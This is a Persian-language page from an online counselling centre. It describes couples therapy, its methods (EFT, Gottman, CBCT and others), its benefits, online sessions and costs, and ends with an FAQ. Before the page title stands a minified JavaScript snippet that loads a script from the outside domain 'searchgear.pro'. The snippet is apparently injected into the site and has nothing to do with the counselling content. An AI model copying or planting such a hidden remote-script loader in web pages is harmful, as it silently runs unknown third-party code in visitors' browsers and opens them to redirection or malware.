;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); زوج درمانی چیست؟ + مشاوره زوج درمانی آنلاین | مرکز مشاوره آنلاین روان‌یاری

زوج درمانی

زوج درمانی نوعی روان‌درمانی است که در آن یک درمانگر دارای مجوز با تجربه بالینی کار با زوج‌ها، به افراد درگیر در یک رابطه عاشقانه کمک می‌کند تا بینشی نسبت به رابطه خود پیدا کنند، تعارض را حل کنند و رابطه را بهبود بخشند.

روابط میان زوج‌ها گاهاً دچار تعارض یا مشکلاتی می‌شود که در صورت برطرف نشدن به موانعی برای گفتگوی سازگار تبدیل می‌شوند. این اتفاق به مرور زمان رخ می‌دهد گویی آجر به آجر دیواری چیده می‌شود که دسترسی زوجین به یکدیگر را برای گفتگویی سالم عملاً ناممکن می‌کند. درمانگر یا روانشناس متخصص با ایجاد فضایی امن برای گفتگو به زوجین کمک می‌کند تا روابط خود را ارتقا داده بتوانند راه گفتگوی سالم با یکدیگر را پیدا کنند. نیازها را بشنوند و در جهت برآورده کردن آنها بکوشند….

زوج درمانی

زوج درمانی چیست؟

بعضا آنچه میان زوج‌ها رخ می‌دهد فضای پرتنشی است که امکان گفتگو در آن وجود ندارد و گویا دیوار بلندی میان آنهاست که هیچ یک صدای دیگری را نمی‌شنود. در این فضای محصور احساس استیصال، تنهایی و دیده نشدن و ناامیدی از همراهی و کمک دیگری تنها بخشی از تجارب دردناکی هستند که زوجین تجربه می‌کنند. این دیوار بلند آجر به آجر توسط تعاملات ناکارآمد تجربه شده بنا شده و حاصل فضاهای درک نشده‌ی میان زوجین است. نیازهای دیده نشده و صداهای شنیده نشده کم کم به تعارض‎های شدیدی تبدیل می‌شوند که ارتباط را سرشار از خشونت کرده و سبک ارتباطیِ سالم و کارآمد را مختل می‌کنند. مشاوره زوج‌ها می‌تواند با فراهم کردن بستری امن برای طرفین به تلطیف فضای عاطفی آسیب دیده بپردازد. زوج درمانی شاید بهترین گزینه‌ای باشد که با ایجاد فضایی امن برای هر یک از زوجین این امکان را ایجاد می‌کند که هر دو شنیده شده و درک شوند همچنین نیازشان دیده شده و برآورده شود.

برایان مولر، دکترای روانشناس در مرکز پزشکی دانشگاه کلمبیا، می‌گوید: « زوج‌درمانی می‌تواند طیف گسترده‌ای از مسائل مربوط به رابطه، از جمله درگیری‌های مکرر، احساس قطع ارتباط، رابطه عاشقانه، مسائل مربوط به رابطه جنسی، یا مشکلات ناشی از استرس‌های بیرونی را برطرف کند.»

زوج درمانگر می‌تواند به زوجین کمک کند تا بر روی مسائل ارتباطی، کشمکش‌های جنسی و صمیمیت، اختلاف نظرهای مالی صحبت کرده و به توافق دست یابند. زوج درمانی به زوجین این امکان را می‌دهد که زندگی مشترکشان را مورد بررسی قرار دهند و برای تغییرات مورد نیاز تصمیم گیری کنند.

چرا به زوج درمانی نیاز داریم؟

هر رابطۀ طولانی مدتی به‌شکلی اجتناب ناپذیر با تعارض، مشکل و اختلاف نظر مواجه می‌شود. مشاور روانشناس زوج درمانی به زوجین کمک می کند تا مهارت های ارتباطی سازگار و افزایش صمیمیت را فرا بگیرند و درکنار آنها قرار می‌‍‌گیرد تا در حل مشکلات بین فردی خویش متعهدانه عمل کنند و با پذیرفتن تفاوت‌ها و شنیدن نیازهای یکدیگر دربارۀ تعارض‌ها گفتگو کنند. ما در مرکز مشاورۀ روان‌یاری با تمرکز بر روی هیجا‎نات پردازش نشده، نیازهای برآورده نشده و شناسایی الگوهای ارتباطی ناسالم میان زوجین و با کمک خود آنها به اصلاح، تغییر و بازسازی رابطه بپردازیم.

تعریف مشاوره زوج درمانی

هر رابطه‌ای می‌تواند تعارض دارشته باشد، در زوج درمانی، یک مشاور دارای مجوز با دو نفر کار می‌کند تا رابطه آنها را بهبود بخشد. زوج درمانی راه حلی است برای زوجینی که قادر به حل مشکلات و تعارضات میان خود نیستند اما به دنبال حل مشکلات و ارتقای ارتباط خود با همسرشان هستند.

زوج درمانی نوعی روان درمانی است که می‌تواند به زوجین در حل مشکلات و در بهبود روابط شان کمک کند. زوجینی که در روابط خود به مشکل برخورده اند می‌توانند برای کمک به بازسازی رابطه خود به دنبال زوج درمانی باشند. زوج درمانی نه تنها می تواند مشکلات بین زوجین را حل کند، بلکه می‌تواند رابطه بین آن ها را نیز بسیار قوی تر کند.

برخی از مسائلی که در جلسات زوج درمانی مورد توجه قرار می‌گیرند، عبارتند از :

 • ناباروری
 • خیانت
 • تصمیم به طلاق
 • خشونت خانگی
 • مشکلات رابطه جنسی
 • و …

انواع زوج درمانی:

بسیاری از مشاوران در انواع مختلف درمان آموزش دیده‌اند و درمان شما را بر اساس نیازهای شما تنظیم می‌کنند.

به گفته مولر، رویکردهای متعددی برای زوج درمانی وجود دارد که می تواند شامل موارد زیر باشد(تکنیک‌های زوج درمانی):

 • درمان متمرکز بر هیجان (EFT) به روش سو جانسون: این رویکرد بر روابط تاثیر زیادی دارد، در واقع زوج درمانی متمرکز بر هیجان در زمینه مشکلات زناشویی توسعه پیدا کرده است. استفاده از مدل درمانی متمرکز بر هیجان در حل تعارضات و اختلافات میان زوجین، به عنوان یکی از رویکردهای روان‌درمانی نوین شناخته شده و نتایج بسیار مثبتی را به همراه داشته است.
 • روش گاتمن: این روش مبتنی بر ارزیابی رابطه زوج‌هاست. هدف این روش بهبود کیفیت روابط بین زوجین است.
 • رویکرد الن واچتل: در این رویکرد به زوج‌ها آموزش داده می‌شود که به‌جای سرزنش طرف مقابل، بر بازتاب رفتار و گفته‌های خود تمرکز کنند.
 • زوج درمانی روان پویشی: این نوع از درمان به زوجین کمک می‌کند که درک بهتری از عواطف یکدیگر داشته باشند. همچنین این روش درمان برای شناخت و بهبود شرایط زندگی، بسیار مؤثر است.
 • رفتاردرمانی شناختی برای زوجین (CBCT): این شکل از درمان با هدف افزایش كیفیت زندگی و سازگاری از طریق بازسازی رفتاری ارائه می شود. تمرکز اصلی این روش بر تغییر افکار منفی ناخودآگاه است که می‌تواند باعث تشدید مشکلات عاطفی، افسردگی و اضطراب باشد.

ضرورت زوج درمانی:

مولر می‌گوید: «درمانگر به شما و همسرتان کمک می‌کند تا احساسات خویش را بشناسید و آن‌ها را در قالب کلمات برای یکدیگر بیان کنید.» 

به گفته مشاوران، زوجین اغلب اختلافاتی دارند که حل نشده باقی می ماند. در واقع، بسیاری از مشاجرات به ناامیدی ختم می شود یا به دعوای دیگری منجر می‌شود.

بیشتر زوج ها می‌توانند از مشاوره برای بهبود ارتباطات، غلبه بر موانع و حفظ یک رابطه سالم بهره ببرند. در بسیاری از موارد، زوج‌ها در مورد مسائل بزرگ‌تری مانند خیانت، خیانت به اعتماد، مسائل مالی، مسائل خانوادگی، اختلافت سلیقه‌ای و فرهنگی و …با هم بحث می‌کنند. زوج درمانی می‌تواند بهترین راهکار برای حل مشکلات و چالش‌های سخت زندگی باشد. هنگام انجام زوج درمانی، با ذهنی باز همراه باشید و آماده باشید که موانع ارتباطی را از بین ببرید.

زوج‌درمانی می‌تواند به هر کسی که در یک رابطه است کمک کند، صرف نظر از جمعیت‌شناسی، گرایش جنسی و سن. آمارها نشان دهنده آن هستند که استفاده از خدمات مشاوره زوج درمانی بر کیفیت روابط بین زوجین افزوده است. زوج درمانی می‌تواند به شما کمک کند تا نحوه برقراری ارتباط با یکدیگر برای حل تعارضات را آموخته و یکدیگر را بهتر درک کنید.

فواید زوج درمانی:

اگر به تجدید رابطه نیاز دارید، صرف نظر از وضعیت تاهل یعنی رسمی یا نیمه رسمی بودن ارتباط، مشاوره ممکن است گزینه خوبی باشد. مراجعه برای دریافت خدمات زوج‌درمانی می‌تواند نشان‌دهنده  اهمیتی باشد که برای رابطه‌تان قائل هستید.

فواید زوج درمانی می‌تواند شامل موارد زیر باشد:

 • یافتن راه‌های جدید برای برقراری ارتباط با شریک زندگی‌تان
 • ایجاد یک فضای امن و آرام در درمان برای بحث در مورد موضوعات دشوار
 • داشتن یک میانجی شخص ثالث برای کمک به تسهیل گفتگوهای سازنده
 • بازسازی اعتماد با یکدیگر
 • یافتن زمینه های مشترک و یادگیری برقراری ارتباط با یکدیگر به شیوه ای محبت آمیز و مهربان
 • شناسایی الگوهای مضر یا مخرب در رابطه خود و پرداختن به آنها
 • ایجاد مرزهای سالم در رابطه
 • و …

مشاوره زوج آنلاین

مشاوره آنلاین نوع جدید و نوینی از مشاوره است که بر اساس نیاز مراجعین آماده شده است.

امروزه دنیای تکنولوژی و ارتباطات پیشرفت کرده است و مشاوره آنلاین به طور قابل توجهی در دسترس قرار دارد. تعداد قابل قبولی از مشاوران این نوع از مشاوره را در برنامه کار خود قرار داده اند. شما از طریق یک تماس تصویری، در هر کجا که باشید می‌توانید به مشاوره آنلاین وصل شوید. مشاوره آنلاین سعی می‌کند تا موانع موجود برای دریافت خدمات مشاوره کنار زده شوند. 

مشاوره آنلاین به طور قابل توجهی در دسترس قرار دارد و دارای محاسنی می باشد:

 • عدم اتلاف وقت
 • هزینه کمتر
 • درمان اثربخش
 • دسترسی آسان
 • عدم مشکلات حمل و نقل
 • و …

هزینه زوج درمانی

امروزه بسیاری از زوجین از نقش و تاثیر بسزای زوج‌درمانی آگاه هستند و می‌دانند که این نوع از درمان چه نقشی در بهبود روابط آنها دارد، با این حال انجام این کار را به تعویق می‌اندازند. به نظر می‌رسد یکی از دلایل عدم مراجعه به زوج درمانگر تصور زوجین از بالا بودن هزینه‌های مشاور است.  افرادی که به دنبال بهبود روابط خود هستند نباید تمرکز خود را بر روی پیدا کردن جلسات مشاوره با هزینه کمتر بگذارند به این دلیل که قیمت کم یا زیاد جلسات مشاوره نمی‌تواند کیفیت کار درمانگر آن را تضمین کند. هزینه جلسات مشاوره به تعداد جلسات مورد نیاز برای حل مساله، تخصص و تجربه درمانگر، نوع مشکل بین زوجین، نحوه نگرش و همچنین میزان تلاش آنها برای درمان بستگی دارد، و در مراکز مختلف به صورت متغیر و متفاوت می باشد.

معرفی زوج درمانگر خوب

این موضوع بسیار مهم است. زوجین می‌توانند در رابطه با این موضوع که آیا ترجیحاتی در رابطه با جنسیت، پیشینه فرهنگی، مکان یا تخصص زوج درمانگر ارائه دهنده زوج درمانی دارند یا خیر با یکدیگر صحبت کنند و به نتیجه دلخواه برسند. همچنین می توانند از  وب‌سایت‌های زیادی که در دسترس هستند و فهرستی از متخصصان سلامت روان یا زوج درمانگرها را معرفی می‌کنند، استفاده کنند.

 

سوالات رایج در زوج درمانی

سوال : جلسات مشاوره آنلاین زوجین چگونه است؟

پاسخ : می‌توانید با هم یا در دستگاه‌های جداگانه وارد شوید، هر کدام که برای شما بهتر است. اولین کاری که ما انجام خواهیم داد این است که در آن همه چیز را در مورد رابطه شما و موقعیت هر یک از شما یاد بگیریم. پس از آن، شروع به بررسی چرخه‌هایی می‌کنیم که در آن گیر کرده‌اید.  مکالمات جدیدی را تمرین می‌کنیم که در آن بتوانید با آسیب‌های قدیمی مقابله کنید و با چالش‌های جدید روبرو شوید.

درمانگر شما طرف رابطه است. ما بین شما دو طرف را انتخاب نمی‌کنیم یا یک طرف رابطه را برای همه مشکلات سرزنش نمی کنیم. زوج درمانگر تا زمانی که بتوانید الگوهای جدیدی در رابطه خود ایجاد کنید  که هر دوی شما احساس دوست داشتنی بودن و رضایت داشته باشید با شما خواهد بود.

سوال : آیا مشاوره آنلاین زوجین به اندازه حضوری موثر است؟

پاسخ : برای بسیاری از زوج ها، مشاوره آنلاین به خوبی یا بهتر از مشاوره سنتی کار می‌کند. این به این دلیل است که زوج‌ها می‌توانند از فضایی وارد جلسات شوند که در آن احساس راحتی می‌کنند و راحت‌تر می‌توانند با قرارهای ملاقات آنلاین سازگار باشند. به طوری که روایت شده، به نظر می‌رسد بسیاری از زوج‌ها با تغییراتی که در درمان ایجاد می‌شود، راحت‌تر کنار می‌آیند و آنها را راحت‌تر اعمال می‌کنند، زیرا یاد گرفته‌اند که این تغییرات را در خانه انجام دهند. برخی از زوج‌ها هستند که اتصالات اینترنتی قوی ندارند یا چالش‌های دیگری دارند که باعث می‌شود مشاوره آنلاین زوج‌ها مناسب نباشد. یکی از دلایلی که پیش از قرارداد درمانی مشاوره رایگان انجام می‌دهیم این است که فرصتی باشد تا قبل از سرمایه‌گذاری شما برای استفاده از شیوه آنلاین، مطمئن شویم که برای شما مفید است.

سوال : آیا اگر با هم دعوا نمی‌کنیم می توانیم مشاوره زوجین انجام دهیم؟

پاسخ : بله! زوج‌ها اغلب برای درمان مراجعه می‌کنند، زیرا یکی یا هر دوی آنها با مشکل مواجه هستند و برای رویارویی با یکدیگر به کمک نیاز دارند. اغلب، یک نفر در گذشته آسیب هایی دارد که کنار آمدن با آنها دشوار است.

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.